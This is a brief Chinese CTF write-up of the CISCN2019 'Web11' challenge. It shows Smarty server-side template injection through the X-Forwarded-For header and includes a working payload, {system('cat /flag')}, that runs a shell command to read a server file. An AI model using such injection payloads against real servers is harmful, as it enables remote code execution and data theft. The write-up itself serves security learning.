[CISCN2019 华东南赛区]Web11

首页长这样

有两个api，分别通过/api和/xff访问

同时页脚提示Build With Smarty！

可能是要寻找注入点

通过浏览器访问/api或/xff会出错，抓包发现301响应的Location没有加上端口号

/xff可以通过修改X-Forwarded-For请求头来控制响应的内容，推测使用smarty来渲染响应，于是尝试对X-Forwarded-For进行注入

X-Forwarded-For: 123

123

X-Forwarded-For: {1+1}

2

X-Forwarded-For: {system('cat /flag')}

#Web #PHP #smarty #SSTI #RCE #HTTP #Header

> Passions & dreams like sora, *zipped* up in my heart